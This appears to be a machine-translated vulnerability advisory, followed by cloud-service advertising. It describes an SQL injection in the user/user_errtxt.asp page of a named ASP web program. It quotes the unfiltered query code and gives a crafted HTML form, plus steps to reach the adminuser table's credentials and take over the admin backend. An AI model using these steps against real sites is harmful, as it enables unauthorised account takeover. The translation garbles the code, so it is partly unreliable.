Anti-DDoS pro
Http://www.asp300.com/View/10/27310.html under source code
Official http://wljy.prinfo.cn/
Vulnerability level: high
Vulnerability description:
The problem with this program is that username is not filtered out in user/user_errtxt.asp.
''''''''
If Request. ServerVariables ("REQUEST_METHOD") = "POST" then
Username1 = trim (Request. Form ("username "))
Sqltext = "select * from userbase where enable = 1 and username =" + username1 + ""
Response. Write sqltext
Response. End
Rs. Open sqltext, cn, 1, 1
If not rs. EOF then
Mmtext = trim (rs ("errtxt "))
Else
Response. Redirect "user_pass.asp? Err = 1"
End if
Rs. Close
End if
'''''''''''
However, username is read from the previous file user/user_pass.asp.
Of course, the previous file user/user_pass.asp is filtered out.
But it does not matter.
1. We can directly construct a form.
<Form action = "Note: Change user_errtxt.asp here? Model = 999 "method = post name = form1>
<Tr> <td align = right> member account: </td> <input name = "username" type = "text" size = 30> </td> </tr>
<Tr> <td align = right> </td> </tr>
<Tr> <td align = right> </td> <input name = "s1" type = "submit" value = "Confirm submission"> <input name =" b1 "type =" reset "value =" cancel REFILL ">
</Td> </tr>
</Form>
2. Register a user name
3. Fill in the form above with the registered user name to judge
4. Guess the password
The table name is adminuser and the field is username userpass.
5. Then we can make the background
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
